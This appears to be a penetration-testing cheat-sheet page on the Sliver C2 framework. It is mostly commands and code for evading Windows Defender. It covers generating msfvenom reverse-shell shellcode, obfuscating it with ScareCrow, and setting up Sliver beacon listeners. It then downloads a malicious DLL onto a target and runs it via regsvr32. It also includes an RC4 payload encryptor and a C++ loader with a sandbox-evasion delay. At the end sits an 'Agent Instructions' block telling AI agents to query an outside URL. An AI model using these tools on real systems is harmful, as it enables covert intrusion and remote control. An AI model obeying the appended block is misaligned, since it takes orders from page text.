# Sliver C2
## Install all post-exploitation tools
```bash
armory install all
```
## Bypass Windows Defender
1. Generate a shellcode (with msfvenom).
```bash
msfvenom -p windows/x64/custom/reverse_winhttp LHOST=10.10.14.13 LPORT=9001 LURI=/hello.woff -f raw -o shellcode.bin
```
2. Download ScareCrow (require Golang).
```bash
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
go build .
```
3. Obfusctate the shellcode with ScareCrow.
```bash
./ScareCrow -I shellcode.bin -Loader dll -nosign
```
3. Setup Sliver C2.
```bash
profiles new beacon --arch amd64 --os windows --mtls 10.10.14.13:9000 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 qu35t
stage-listener --url http://10.10.14.13:9001 --profile qu35t --prepend-size
mtls --lhost 10.10.14.13 --lport 9000
```
Windows Defender Status
4. Upload and execute your malicious dll on the target machine.
```powershell
mkdir C:/Temp/
cd C:/Temp/
(New-Object Net.WebClient).DownloadFile('http://10.10.14.13/qu35t.dll','C:\Temp\qu35t.dll')
regsvr32.exe .\qu35t.dll, DLLRegisterServer
```
```python
import sys
def rc4(data, key):
keylen = len(key)
s = list(range(256))
j = 0
for i in range(256):
j = (j + s[i] + key[i % keylen]) % 256;
s[i], s[j] = s[j], s[i]
i = 0
j = 0
encrypted = bytearray()
for n in range(len(data)):
i = (i + 1) % 256;
j = (j + s[i]) % 256;
s[i], s[j] = s[j], s[i]
encrypted.append(data[n] ^ s[(s[i] + s[j]) % 256])
return encrypted
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: ./rc4.py ")
exit(0)
key = sys.argv[1]
filename = sys.argv[2]
with open(filename, 'rb') as f:
data = f.read()
encrypted = rc4(data, key.encode())
with open(f"{filename}.enc", 'wb') as f:
f.write(encrypted)
print(f"Written {filename}.enc")
```
```cpp
#include
#include
#include
#include
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
extern "C" void RunData();
void rc4(unsigned char* data, int len, const char* key) {
int keylen = strlen(key);
unsigned char s[256];
for (int i = 0; i < 256; i++) {
s[i] = i;
}
unsigned char j = 0;
for (int i = 0; i < 256; i++) {
j = (j + s[i] + key[i % keylen]) % 256;
unsigned char tmp = s[i];
s[i] = s[j];
s[j] = tmp;
}
int i = 0;
j = 0;
for (int n = 0; n < len; n++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
unsigned char tmp = s[i];
s[i] = s[j];
s[j] = tmp;
data[n] ^= s[(s[i] + s[j]) % 256];
}
}
int main(int argc, char** argv) {
auto start = std::chrono::system_clock::now();
std::this_thread::sleep_for(std::chrono::seconds(5));
auto end = std::chrono::system_clock::now();
std::chrono::duration elapsed_seconds = end - start;
if (elapsed_seconds.count() < 4.5) {
exit(0);
}
const char* key = "advapi32.dll";
int len = 2121221;
DWORD oldProtect = 0;
if (!VirtualProtect((LPVOID)&RunData, len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
printf("Error: %d", GetLastError());
}
rc4((unsigned char*)&RunData, len, key);
VirtualProtect((LPVOID)&RunData, len, oldProtect, &oldProtect);
RunData();
}
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://docs.qu35t.pw/sliver-c2.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.